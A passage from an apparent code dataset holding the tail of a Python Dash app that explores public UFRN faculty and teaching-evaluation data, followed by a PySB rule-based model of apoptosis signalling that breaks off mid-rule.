['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\n# Define o layout a ser apresentado na página web\napp.layout = html.Div([\n html.H1(children='Análise dos dados dos docentes do magistério superior da UFRN das unidades de Natal no ano de 2021'),\n html.Div([\n dcc.Markdown('''\nTrabalho referente à disciplina DCA-0131, Ciência de Dados, ministrada pelo professor Luiz Affonso Hederson Guedes de Oliveira.\n\nPlataforma desenvolvida pelos discentes Darlan de Castro e Marcos Henrique, alunos do curso de Engenharia Computação da UFRN.\n\nA aplicação web desenvolvida consiste em uma análise exploratória dos dados sobre os docentes do magistério superior das unidades de Natal da Universidade Federal do Rio Grande do Norte (UFRN) no ano de 2021.\n\nOs dados utilizados aqui podem ser acessados pelo seguinte site: [http://dados.ufrn.br](http://dados.ufrn.br)\n\nAs principais tecnologias usadas para o desenvolvimento da plataforma foram:\n\n* Linguagem Python;\n* Pacotes Pandas, Plotly e Dash;\n* Heroku (deploy da aplicação).\n''')\n ]),\n html.H2(\n children='Divisão dos docentes do magistério superior da UFRN no ano de 2021'),\n html.Div([\n\n html.Div([\n dcc.Markdown('''\n Nesta seção da aplicação pode-se acompanhar a divisão dos docentes através de difentes categorias, como sexo, formação e classe funcional, assim como ver como eles estão distribuídos por cada unidade responsável na UFRN.\n\n Na primeira caixa de seleção pode-se escolher qual unidade responsável deseja-se analisar. Assim, são atualizados os três primeiros gráficos com informações das divisões dos decentes referentes a cada lotação que compõe aquela unidade responsável.\n\n Se a opção for escolhida for \"GERAL\", então pode-se mostar gráficos gerais sobre toda as unidades de Natal da UFRN, ou gráficos detalhados mostrando a divisão por unidades responsáveis.\n '''),\n dcc.Dropdown(\n id='dropdown-1',\n options=[{'label': i, 'value': i}\n for i in indicadoresDropdown1],\n value='GERAL'\n ),\n dcc.RadioItems(\n id='radioitems-1',\n options=[{'label': i, 'value': i}\n for i in ['GERAL', 'DETALHADA']],\n value='GERAL',\n labelStyle={'display': 'inline-block'}\n )\n ],\n style={'width': '80%', 'display': 'inline-block'}),\n\n\n html.Div([\n dcc.Graph(\n id='grafico-sexo')\n ], style=estilosDivGraficosIniciais),\n html.Div([\n dcc.Graph(\n id='grafico-formacao')\n ], style=estilosDivGraficosIniciais),\n html.Div([\n dcc.Graph(\n id='grafico-classe')\n ], style=estilosDivGraficosIniciais),\n html.Div([\n dcc.Graph(\n id='grafico-sobra',\n figure=figuraDocentesUnidadeDirigente)\n ], style=estilosDivGraficosIniciais, id='div-grafico-sobra'),\n ]),\n\n html.H2(children='Estatísticas das avaliações dos docentes do magistério superior da UFRN (campus Natal) nos anos de 2013 à 2019'),\n dcc.Markdown('''\n Nesta seção da aplicação pode-se acompanhar dados sobre as avaliações dos docentes da UFRN e da autoavalição dos alunos feita a cada fim de semestre. Os dados disponibilizados constam do período de 2013 à 2019.\n\n Ao todo são três dados importantes a serem considerados a média de postura dos docentes, a média de atuação dos docentes e autoavaliação dos alunos.\n\n No primeiro gráfico pode-se acompanhar a média desses três quesitos por cada unidade responsável.\n '''),\n html.Div([\n dcc.Graph(\n id='grafico-nota-1')\n ], style={'width': '95%', 'display': 'inline-block', 'padding': '0 20'}),\n html.Div([\n dcc.Slider(\n id='slider-grafico-nota-1',\n min=1,\n max=3,\n value=1,\n marks={str(i): str(i) for i in [1, 2, 3]},\n step=None)],\n style={'width': '80%', 'padding': '0px 15px 15px 15px'}),\n\n dcc.Markdown('''\n * Opção 1 - Média de atuação dos docentes;\n * Opção 2 - Média de postura dos docentes;\n * Opção 3 - Média da autoavaliação dos discentes.\n '''),\n\n dcc.Markdown('''\n No segundo gráfico há dados sobre a evolução das médias de postura e atuação dos docentes e autoavaliação dos discentes ao longo dos anos. \n '''),\n\n html.Div([\n dcc.Graph(\n id='grafico-nota-2',\n figure=figuraMediasAnoGroupBy)\n ], style={'width': '95%', 'display': 'inline-block', 'padding': '0 20'}),\n\n dcc.Markdown('''\n No terceito gráfico pode-se ver um histograma com a frequência das médias de postura e atuação dos docentes dividida por sexo.\n '''),\n\n html.Div([\n dcc.Graph(\n id='grafico-histograma')\n ], style={'width': '95%', 'display': 'inline-block', 'padding': '0 20'}),\n html.Div([\n dcc.Slider(\n id='slider-grafico-histograma',\n min=1,\n max=2,\n value=1,\n marks={str(i): str(i) for i in [1, 2]},\n step=None)],\n style={'width': '80%', 'padding': '0px 15px 15px 15px'}),\n\n dcc.Markdown('''\n * Opção 1 - Média de atuação dos docentes;\n * Opção 2 - Média de postura dos docentes.\n '''),\n\n dcc.Markdown('''\n Nesta parte, pode-se selecionar uma unidade responsável (primeira caixa de seleção) e a partir dela escolher uma lotação (segunda caixa de seleção) para verificar a média de atuação e postura de cada profressor, assim como da autoavaliação dos discentes das turmas desses docentes e quantidade de discentes que passaram por eles, para cada departamento da UFRN.\n '''),\n html.Div([\n dcc.Dropdown(\n id='dropdown-2',\n options=[{'label': i, 'value': i}\n for i in docenteParaTabelaNotas['unidade_dirigente'].unique()],\n value=docenteParaTabelaNotas['unidade_dirigente'].iloc[0]\n )],\n style={'width': '80%', 'display': 'inline-block'}),\n\n html.Div([\n dcc.Dropdown(\n id='dropdown-3',\n )],\n style={'width': '80%', 'display': 'inline-block'}),\n\n html.Div([\n dash_table.DataTable(\n id='table-nota',\n columns=[{\"name\": i, \"id\": i} for i in [\n 'nome', 'media_postura', 'media_atuacao', 'media_alunos', 'qtd_discentes']],\n style_cell={'textAlign': 'left'},\n )\n ], style={'width': '95%', 'display': 'inline-block', 'padding': '0 20'}),\n\n])\n\n# Callback para atualização do estilo dos gráfico de barras (quatantidadeDocente x unidade_dirigente)\n# Entradas: 'value' - 'dropdown-1', 'value' - 'radioitems-1'\n# Saída: 'figure' - 'grafico-classe'\n\n\n@app.callback(\n dash.dependencies.Output('div-grafico-sobra', 'style'),\n [dash.dependencies.Input('dropdown-1', 'value'),\n dash.dependencies.Input('radioitems-1', 'value')])\ndef visibility_graficoSobra(dropValue, radioValue):\n if(radioValue == 'GERAL' and dropValue == 'GERAL'):\n estilosDivGraficosIniciais['display'] = 'inline-block'\n return estilosDivGraficosIniciais\n estilosDivGraficosIniciais['display'] = 'none'\n return estilosDivGraficosIniciais\n\n# Callback para atualização da 'figure' no gráfico por sexo.\n# Entradas: 'value' - 'dropdown-1', 'value' - 'radioitems-1'\n# Saída: 'figure' - 'grafico-sexo'\n\n\n@app.callback(\n dash.dependencies.Output('grafico-sexo', 'figure'),\n [dash.dependencies.Input('dropdown-1', 'value'),\n dash.dependencies.Input('radioitems-1', 'value')])\ndef att_sexo(dropValue, radioValue):\n if(radioValue == 'GERAL' and dropValue == 'GERAL'):\n return figuraDocentesSexo\n elif(radioValue == 'DETALHADA' and dropValue == 'GERAL'):\n return figSexoDetalhe\n return filtrarDFPorUnidadeDirigente(dfUnidadesDirigentes, dropValue, 'lotacao', 'sexo')\n\n# Callback para atualização da 'figure' no gráfico por formação\n# Entradas: 'value' - 'dropdown-1', 'value' - 'radioitems-1'\n# Saída: 'figure' - 'grafico-formacao'\n\n\n@app.callback(\n dash.dependencies.Output('grafico-formacao', 'figure'),\n [dash.dependencies.Input('dropdown-1', 'value'),\n dash.dependencies.Input('radioitems-1', 'value')])\ndef att_formacao(dropValue, radioValue):\n if(radioValue == 'GERAL' and dropValue == 'GERAL'):\n return figuraDocentesFormacao\n elif(radioValue == 'DETALHADA' and dropValue == 'GERAL'):\n return figFormacaoDetalhe\n return filtrarDFPorUnidadeDirigente(dfUnidadesDirigentes, dropValue, 'lotacao', 'formacao')\n\n# Callback para atualização da 'figure' no gráfico por classe\n# Entradas: 'value' - 'dropdown-1', 'value' - 'radioitems-1'\n# Saída: 'figure' - 'grafico-classe'\n\n\n@app.callback(\n dash.dependencies.Output('grafico-classe', 'figure'),\n [dash.dependencies.Input('dropdown-1', 'value'),\n dash.dependencies.Input('radioitems-1', 'value')])\ndef att_classe(dropValue, radioValue):\n if(radioValue == 'GERAL' and dropValue == 'GERAL'):\n return figuraDocentesClasseFuncional\n elif(radioValue == 'DETALHADA' and dropValue == 'GERAL'):\n return figClasseDetalhe\n return filtrarDFPorUnidadeDirigente(dfUnidadesDirigentes, dropValue, 'lotacao', 'classe_funcional')\n\n# Callback para atualização da 'figure' no gráfico por nota\n# Entradas: 'value' - 'slider-grafico-nota-1'\n# Saída: 'figure' - 'grafico-nota-1'\n\n\n@app.callback(\n dash.dependencies.Output('grafico-nota-1', 'figure'),\n [dash.dependencies.Input('slider-grafico-nota-1', 'value')])\ndef att_nota1(sliderValue):\n var = 'media_atuacao'\n if sliderValue == 2:\n var = 'media_postura'\n elif sliderValue == 3:\n var = 'media_alunos'\n return px.scatter(docentesMediaUnidadeDirigente, x=\"unidade_dirigente\", y=var,\n size=var, hover_name=\"unidade_dirigente\", color=\"unidade_dirigente\")\n\n# Callback para atualização da 'figure' no histograma\n# Entradas: 'value' - 'slider-grafico-histograma'\n# Saída: 'figure' - 'grafico-histograma'\n\n\n@app.callback(\n dash.dependencies.Output('grafico-histograma', 'figure'),\n [dash.dependencies.Input('slider-grafico-histograma', 'value')])\ndef att_histograma(sliderValue):\n var = 'media_atuacao'\n if sliderValue == 2:\n var = 'media_postura'\n return px.histogram(docentesMediasNatalMSUnidadeAcademica, x=var, color=\"sexo\", title='Histograma da avaliação dos docentes do magistério superior da UFRN nos anos de 2013 à 2019')\n\n# Callback para atualização das 'options' no dropdown por lotação da tabela\n# Entradas: 'value' - 'dropdown-2'\n# Saída: 'options' - 'dropdown-3'\n\n\n@app.callback(\n dash.dependencies.Output('dropdown-3', 'options'),\n [dash.dependencies.Input('dropdown-2', 'value')])\ndef att_dropdown3Options(dropValue):\n df = docenteParaTabelaNotas[docenteParaTabelaNotas['unidade_dirigente'] == dropValue]\n del df['unidade_dirigente']\n return [{'label': 'GERAL', 'value': 'GERAL'}] + [{'label': i, 'value': i} for i in df['lotacao'].unique()]\n\n# Callback para atualização do 'value' no dropdown por lotação da tabela\n# Entradas: 'value' - 'dropdown-2'\n# Saída: 'value' - 'dropdown-3'\n\n\n@app.callback(\n dash.dependencies.Output('dropdown-3', 'value'),\n [dash.dependencies.Input('dropdown-2', 'value')])\ndef att_dropdown3Value(dropValue):\n return 'GERAL'\n\n# Callback para atualização da 'data' na tabela de exposição das notas dos professores por unidade_dirigente e lotação\n# Entradas: 'value' - 'dropdown-2', value' - 'dropdown-3'\n# Saída: 'data' - 'table-nota'\n\n\n@app.callback(\n dash.dependencies.Output('table-nota', 'data'),\n [dash.dependencies.Input('dropdown-2', 'value'),\n dash.dependencies.Input('dropdown-3', 'value')])\ndef att_table(dropValue2, dropValue3):\n df = docenteParaTabelaNotas[docenteParaTabelaNotas['unidade_dirigente'] == dropValue2]\n del df['unidade_dirigente']\n if dropValue3 == 'GERAL':\n del df['lotacao']\n return df.to_dict(\"records\")\n df = docenteParaTabelaNotas[docenteParaTabelaNotas['lotacao'] == dropValue3]\n del df['lotacao']\n return df.to_dict(\"records\")\n\n\n# Atribui o servidor da aplicação a variável server\nserver = app.server\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n"} {"ext": "py", "sha": "1a2eba011c074c0754bab4c140f94ad660cb4a7b", "content": "# exported from PySB model 'model'\n\nfrom pysb import Model, Monomer, Parameter, Expression, Compartment, Rule, Observable, Initial, MatchOnce, Annotation, ANY, WILD\n\nModel()\n\nMonomer('Ligand', ['Receptor'])\nMonomer('ParpU', ['C3A'])\nMonomer('C8A', ['BidU', 'C3pro'])\nMonomer('SmacM', ['BaxA'])\nMonomer('BaxM', ['BidM', 'BaxA'])\nMonomer('Apop', ['C3pro', 'Xiap'])\nMonomer('Fadd', ['Receptor', 'C8pro'])\nMonomer('SmacC', ['Xiap'])\nMonomer('ParpC')\nMonomer('Xiap', ['SmacC', 'Apop', 'C3A'])\nMonomer('C9')\nMonomer('C3ub')\nMonomer('C8pro', ['Fadd', 'C6A'])\nMonomer('C6A', ['C8pro'])\nMonomer('C3pro', ['Apop', 'C8A'])\nMonomer('CytoCM', ['BaxA'])\nMonomer('CytoCC')\nMonomer('BaxA', ['BaxM', 'BaxA_1', 'BaxA_2', 'SmacM', 'CytoCM'])\nMonomer('ApafI')\nMonomer('BidU', ['C8A'])\nMonomer('BidT')\nMonomer('C3A', ['Xiap', 'ParpU', 'C6pro'])\nMonomer('ApafA')\nMonomer('BidM', ['BaxM'])\nMonomer('Receptor', ['Ligand', 'Fadd'])\nMonomer('C6pro', ['C3A'])\n\nParameter('bind_0_Ligand_binder_Receptor_binder_target_2kf', 1.0)\nParameter('bind_0_Ligand_binder_Receptor_binder_target_1kr', 1.0)\nParameter('bind_0_Receptor_binder_Fadd_binder_target_2kf', 1.0)\nParameter('bind_0_Receptor_binder_Fadd_binder_target_1kr', 1.0)\nParameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf', 1.0)\nParameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr', 1.0)\nParameter('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)\nParameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf', 1.0)\nParameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr', 1.0)\nParameter('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc', 1.0)\nParameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf', 1.0)\nParameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr', 1.0)\nParameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf', 1.0)\nParameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr', 1.0)\nParameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf', 1.0)\nParameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr', 1.0)\nParameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)\nParameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)\nParameter('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)\nParameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf', 1.0)\nParameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr', 1.0)\nParameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf', 1.0)\nParameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr', 1.0)\nParameter('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc', 1.0)\nParameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf', 1.0)\nParameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr', 1.0)\nParameter('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc', 1.0)\nParameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kf', 1.0)\nParameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kr', 1.0)\nParameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf', 1.0)\nParameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr', 1.0)\nParameter('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc', 1.0)\nParameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf', 1.0)\nParameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr', 1.0)\nParameter('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc', 1.0)\nParameter('pore_formation_0_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_0_BaxA_pore_1kr', 1.0)\nParameter('pore_formation_1_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_1_BaxA_pore_1kr', 1.0)\nParameter('pore_formation_2_BaxA_pore_2kf', 1.0)\nParameter('pore_formation_2_BaxA_pore_1kr', 1.0)\nParameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf', 1.0)\nParameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr', 1.0)\nParameter('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc', 1.0)\nParameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf', 1.0)\nParameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr', 1.0)\nParameter('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc', 1.0)\nParameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)\nParameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)\nParameter('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)\nParameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf', 1.0)\nParameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr', 1.0)\nParameter('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc', 1.0)\nParameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf', 1.0)\nParameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr', 1.0)\nParameter('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)\nParameter('Ligand_0', 1000.0)\nParameter('ParpU_0', 1000000.0)\nParameter('C8A_0', 0.0)\nParameter('SmacM_0', 100000.0)\nParameter('BaxM_0', 40000.0)\nParameter('Apop_0', 0.0)\nParameter('Fadd_0', 130000.0)\nParameter('SmacC_0', 0.0)\nParameter('ParpC_0', 0.0)\nParameter('Xiap_0', 122250.0)\nParameter('C9_0', 100000.0)\nParameter('C3ub_0', 0.0)\nParameter('C8pro_0', 130000.0)\nParameter('C6A_0', 0.0)\nParameter('C3pro_0', 21000.0)\nParameter('CytoCM_0', 500000.0)\nParameter('CytoCC_0', 0.0)\nParameter('BaxA_0', 0.0)\nParameter('ApafI_0', 100000.0)\nParameter('BidU_0', 171000.0)\nParameter('BidT_0', 0.0)\nParameter('C3A_0', 0.0)\nParameter('ApafA_0', 0.0)\nParameter('BidM_0', 0.0)\nParameter('Receptor_0', 100.0)\nParameter('C6pro_0', 100.0)\n\nObservable('Ligand_obs', Ligand())\nObservable('ParpU_obs', ParpU())\nObservable('C8A_obs', C8A())\nObservable('SmacM_obs', SmacM())\nObservable('BaxM_obs', BaxM())\nObservable('Apop_obs', Apop())\nObservable('Fadd_obs', Fadd())\nObservable('SmacC_obs', SmacC())\nObservable('ParpC_obs', ParpC())\nObservable('Xiap_obs', Xiap())\nObservable('C9_obs', C9())\nObservable('C3ub_obs', C3ub())\nObservable('C8pro_obs', C8pro())\nObservable('C6A_obs', C6A())\nObservable('C3pro_obs', C3pro())\nObservable('CytoCM_obs', CytoCM())\nObservable('CytoCC_obs', CytoCC())\nObservable('BaxA_obs', BaxA())\nObservable('ApafI_obs', ApafI())\nObservable('BidU_obs', BidU())\nObservable('BidT_obs', BidT())\nObservable('C3A_obs', C3A())\nObservable('ApafA_obs', ApafA())\nObservable('BidM_obs', BidM())\nObservable('Receptor_obs', Receptor())\nObservable('C6pro_obs', C6pro())\n\nRule('bind_0_Ligand_binder_Receptor_binder_target', Ligand(Receptor=None) + Receptor(Ligand=None, Fadd=None) | Ligand(Receptor=1) % Receptor(Ligand=1, Fadd=None), bind_0_Ligand_binder_Receptor_binder_target_2kf, bind_0_Ligand_binder_Receptor_binder_target_1kr)\nRule('bind_0_Receptor_binder_Fadd_binder_target', Receptor(Ligand=ANY, Fadd=None) + Fadd(Receptor=None, C8pro=None) | Receptor(Ligand=ANY, Fadd=1) % Fadd(Receptor=1, C8pro=None), bind_0_Receptor_binder_Fadd_binder_target_2kf, bind_0_Receptor_binder_Fadd_binder_target_1kr)\nRule('substrate_binding_0_Fadd_catalyzer_C8pro_substrate', Fadd(Receptor=ANY, C8pro=None) + C8pro(Fadd=None, C6A=None) | Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None), substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf, substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr)\nRule('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product', Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None) >> Fadd(Receptor=ANY, C8pro=None) + C8A(BidU=None, C3pro=None), catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc)\nRule('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=None, C3pro=None) + BidU(C8A=None) | C8A(BidU=1, C3pro=None) % BidU(C8A=1), catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf, catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr)\nRule('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=1, C3pro=None) % BidU(C8A=1) >> C8A(BidU=None, C3pro=None) + BidT(), catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc)\nRule('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex', ApafI() + CytoCC() | ApafA(), conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf, conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr)\nRule('inhibition_0_SmacC_inhibitor_Xiap_inh_target', SmacC(Xiap=None) + Xiap(SmacC=None, Apop=None, C3A=None) | SmacC(Xiap=1) % Xiap(SmacC=1, Apop=None, C3A=None), inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf, inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr)\nRule('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex', ApafA() + C9() | Apop(C3pro=None, Xiap=None), conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf, conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr)\nRule('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=None, Xiap=None) + C3pro(Apop=None, C8A=None) | Apop(C3pro=1, Xiap=None) % C3pro(Apop=1, C8A=None), catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr)\nRule('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=1, Xiap=None) % C3pro(Apop=1, C8A=None) >> Apop(C3pro=None, Xiap=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc)\nRule('inhibition_0_Xiap_inhibitor_Apop_inh_target', Xiap(SmacC=None, Apop=None, C3A=None) + Apop(C3pro=None, Xiap=None) | Xiap(SmacC=None, Apop=1, C3A=None) % Apop(C3pro=None, Xiap=1), inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf, inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr)\nRule('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, Apop=None, C3A=None) + C3A(Xiap=None, ParpU=None, C6pro=None) | Xiap(SmacC=None, Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None), catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf, catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr)\nRule('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(SmacC=None, Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None, C6pro=None) >> Xiap(SmacC=None, Apop=None, C3A=None) + C3ub(), catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc)\nRule('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=None, C6pro=None) + ParpU(C3A=None) | C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1), catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf, catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr)\nRule('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=1, C6pro=None) % ParpU(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + ParpC(), catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc)\nRule('equilibration_0_BidT_equil_a_BidM_equil_b', BidT() | BidM(BaxM=None), equilibration_0_BidT_equil_a_BidM_equil_b_1kf, equilibration_0_BidT_equil_a_BidM_equil_b_1kr)\nRule('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=None) + BaxM(BidM=None, BaxA=None) | BidM(BaxM=1) % BaxM(BidM=1, BaxA=None), catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf, catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr)\nRule('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=1) % BaxM(BidM=1, BaxA=None) >> BidM(BaxM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc)\nRule('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxM(BidM=None, BaxA=None) | BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) % BaxM(BidM=None, BaxA=1), self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf, self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr)\nRule('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) % BaxM(BidM=None, BaxA=1) >> BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc)\nRule('pore_formation_0_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, SmacM=None, CytoCM=None), pore_formation_0_BaxA_pore_2kf, pore_formation_0_BaxA_pore_1kr)\nRule('pore_formation_1_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, SmacM=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None), pore_formation_1_BaxA_pore_2kf, pore_formation_1_BaxA_pore_1kr)\nRule('pore_formation_2_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None), pore_formation_2_BaxA_pore_2kf, pore_formation_2_BaxA_pore_1kr)\nRule('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + SmacM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=5, CytoCM=None) % SmacM(BaxA=5), transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf, transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr)\nRule('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, 